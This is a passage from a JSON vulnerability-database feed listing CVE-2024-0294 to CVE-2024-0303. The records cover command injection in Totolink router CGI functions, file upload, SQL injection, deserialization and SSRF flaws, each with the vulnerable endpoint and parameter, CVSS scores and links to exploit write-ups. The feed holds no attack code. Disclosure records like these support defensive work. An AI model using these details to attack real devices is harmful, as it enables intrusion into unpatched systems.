"scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-08T03:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0294", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/setUssd/README.md", "name" : "https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/setUssd/README.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/setUssd/README.md", "name" : "https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/setUssd/README.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249860", "name" : "https://vuldb.com/?ctiid.249860", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.249860", "name" : "https://vuldb.com/?ctiid.249860", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.249860", "name" : "https://vuldb.com/?id.249860", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.249860", "name" : "https://vuldb.com/?id.249860", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as critical, has been found in Totolink LR1200GB 9.1.0u.6619_B20230130. Affected by this issue is the function setUssd of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument ussd leads to os command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249860. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:totolink:lr1200gb_firmware:9.1.0u.6619_b20230130:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:totolink:lr1200gb:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-08T03:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0295", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/setWanCfg/README.md", "name" : "https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/setWanCfg/README.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/setWanCfg/README.md", "name" : "https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/setWanCfg/README.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249861", "name" : "https://vuldb.com/?ctiid.249861", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.249861", "name" : "https://vuldb.com/?ctiid.249861", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.249861", "name" : "https://vuldb.com/?id.249861", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.249861", "name" : "https://vuldb.com/?id.249861", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as critical, was found in Totolink LR1200GB 9.1.0u.6619_B20230130. This affects the function setWanCfg of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument hostName leads to os command injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249861 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:totolink:lr1200gb_firmware:9.1.0u.6619_b20230130:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:totolink:lr1200gb:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-08T04:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0296", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-78" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/jylsec/vuldb/blob/main/TOTOLINK/N200RE/NTPSyncWithHost/README.md", "name" : "https://github.com/jylsec/vuldb/blob/main/TOTOLINK/N200RE/NTPSyncWithHost/README.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://github.com/jylsec/vuldb/blob/main/TOTOLINK/N200RE/NTPSyncWithHost/README.md", "name" : "https://github.com/jylsec/vuldb/blob/main/TOTOLINK/N200RE/NTPSyncWithHost/README.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249862", "name" : "https://vuldb.com/?ctiid.249862", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.249862", "name" : "https://vuldb.com/?ctiid.249862", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.249862", "name" : "https://vuldb.com/?id.249862", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.249862", "name" : "https://vuldb.com/?id.249862", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability has been found in Totolink N200RE 9.3.5u.6139_B20201216 and classified as critical. This vulnerability affects the function NTPSyncWithHost of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument host_time leads to os command injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-249862 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:totolink:n200re_firmware:9.3.5u.6139_b20201216:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:totolink:n200re:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-08T04:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0297", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-78" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/jylsec/vuldb/blob/main/TOTOLINK/N200RE/UploadFirmwareFile/README.md", "name" : "https://github.com/jylsec/vuldb/blob/main/TOTOLINK/N200RE/UploadFirmwareFile/README.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://github.com/jylsec/vuldb/blob/main/TOTOLINK/N200RE/UploadFirmwareFile/README.md", "name" : "https://github.com/jylsec/vuldb/blob/main/TOTOLINK/N200RE/UploadFirmwareFile/README.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249863", "name" : "https://vuldb.com/?ctiid.249863", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.249863", "name" : "https://vuldb.com/?ctiid.249863", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.249863", "name" : "https://vuldb.com/?id.249863", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.249863", "name" : "https://vuldb.com/?id.249863", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Totolink N200RE 9.3.5u.6139_B20201216 and classified as critical. This issue affects the function UploadFirmwareFile of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument FileName leads to os command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249863. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:totolink:n200re_firmware:9.3.5u.6139_b20201216:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:totolink:n200re:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-08T05:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0298", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-78" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/jylsec/vuldb/blob/main/TOTOLINK/N200RE/setDiagnosisCfg/README.md", "name" : "https://github.com/jylsec/vuldb/blob/main/TOTOLINK/N200RE/setDiagnosisCfg/README.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://github.com/jylsec/vuldb/blob/main/TOTOLINK/N200RE/setDiagnosisCfg/README.md", "name" : "https://github.com/jylsec/vuldb/blob/main/TOTOLINK/N200RE/setDiagnosisCfg/README.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249864", "name" : "https://vuldb.com/?ctiid.249864", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.249864", "name" : "https://vuldb.com/?ctiid.249864", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.249864", "name" : "https://vuldb.com/?id.249864", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.249864", "name" : "https://vuldb.com/?id.249864", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Totolink N200RE 9.3.5u.6139_B20201216. It has been classified as critical. Affected is the function setDiagnosisCfg of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument ip leads to os command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249864. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:totolink:n200re_firmware:9.3.5u.6139_b20201216:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:totolink:n200re:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-08T05:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0299", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-78" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/jylsec/vuldb/blob/main/TOTOLINK/N200RE/setTracerouteCfg/README.md", "name" : "https://github.com/jylsec/vuldb/blob/main/TOTOLINK/N200RE/setTracerouteCfg/README.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://github.com/jylsec/vuldb/blob/main/TOTOLINK/N200RE/setTracerouteCfg/README.md", "name" : "https://github.com/jylsec/vuldb/blob/main/TOTOLINK/N200RE/setTracerouteCfg/README.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249865", "name" : "https://vuldb.com/?ctiid.249865", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.249865", "name" : "https://vuldb.com/?ctiid.249865", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.249865", "name" : "https://vuldb.com/?id.249865", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.249865", "name" : "https://vuldb.com/?id.249865", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Totolink N200RE 9.3.5u.6139_B20201216. It has been declared as critical. Affected by this vulnerability is the function setTracerouteCfg of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument command leads to os command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249865 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:totolink:n200re_firmware:9.3.5u.6139_b20201216:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:totolink:n200re:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-08T06:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0300", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/tolkent/cve/blob/main/upload.md", "name" : "https://github.com/tolkent/cve/blob/main/upload.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://github.com/tolkent/cve/blob/main/upload.md", "name" : "https://github.com/tolkent/cve/blob/main/upload.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249866", "name" : "VDB-249866 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.249866", "name" : "VDB-249866 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.249866", "name" : "VDB-249866 | Byzoro Smart S150 Management Platform HTTP POST Request userattestation.php unrestricted upload", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.249866", "name" : "VDB-249866 | Byzoro Smart S150 Management Platform HTTP POST Request userattestation.php unrestricted upload", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?submit.260962", "name" : "Submit #260962 | Beijing Baizhuo Network Technology Co., LTD Smart S150 management platform S150 files upload", "refsource" : "", "tags" : [ ] }, { "url" : "https://vuldb.com/?submit.260962", "name" : "Submit #260962 | Beijing Baizhuo Network Technology Co., LTD Smart S150 management platform S150 files upload", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Byzoro Smart S150 Management Platform up to 20240101. It has been rated as critical. Affected by this issue is some unknown functionality of the file /useratte/userattestation.php of the component HTTP POST Request Handler. The manipulation of the argument web_img leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-249866 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:byzoro:smart_s150_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding" : "2024-01-01", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:byzoro:smart_s150:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-08T06:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0301", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/laoquanshi/heishou/blob/main/iparking-SQL.pdf", "name" : "https://github.com/laoquanshi/heishou/blob/main/iparking-SQL.pdf", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://github.com/laoquanshi/heishou/blob/main/iparking-SQL.pdf", "name" : "https://github.com/laoquanshi/heishou/blob/main/iparking-SQL.pdf", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249868", "name" : "https://vuldb.com/?ctiid.249868", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249868", "name" : "https://vuldb.com/?ctiid.249868", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249868", "name" : "https://vuldb.com/?id.249868", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249868", "name" : "https://vuldb.com/?id.249868", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as critical was found in fhs-opensource iparking 1.5.22.RELEASE. This vulnerability affects the function getData of the file src/main/java/com/xhb/pay/action/PayTempOrderAction.java. The manipulation leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249868." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:fhs-opensource:iparking:1.5.22:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-08T07:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0302", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/laoquanshi/heishou/blob/main/Iparking%20rce.pdf", "name" : "https://github.com/laoquanshi/heishou/blob/main/Iparking%20rce.pdf", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://github.com/laoquanshi/heishou/blob/main/Iparking%20rce.pdf", "name" : "https://github.com/laoquanshi/heishou/blob/main/Iparking%20rce.pdf", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249869", "name" : "https://vuldb.com/?ctiid.249869", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249869", "name" : "https://vuldb.com/?ctiid.249869", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249869", "name" : "https://vuldb.com/?id.249869", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249869", "name" : "https://vuldb.com/?id.249869", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as critical, has been found in fhs-opensource iparking 1.5.22.RELEASE. This issue affects some unknown processing of the file /vueLogin. The manipulation leads to deserialization. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249869 was assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:fhs-opensource:iparking:1.5.22:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-08T07:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0303", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-918" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://note.zhaoj.in/share/fssH60eQkvSl", "name" : "https://note.zhaoj.in/share/fssH60eQkvSl", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://note.zhaoj.in/share/fssH60eQkvSl", "name" : "https://note.zhaoj.in/share/fssH60eQkvSl", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.249870", "name" : "https://vuldb.com/?ctiid.249870", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249870", "name" : "https://vuldb.com/?ctiid.249870", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249870", "name" : "https://vuldb.com/?id.249870", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249870", "name" : "https://vuldb.com/?id.249870", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as critical, was found in Youke365 up to 1.5.3. Affected is an unknown function of the file /app/api/controller/caiji.php of the component Parameter Handler. The manipulation of the argument url leads to server-side request forgery. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-249870 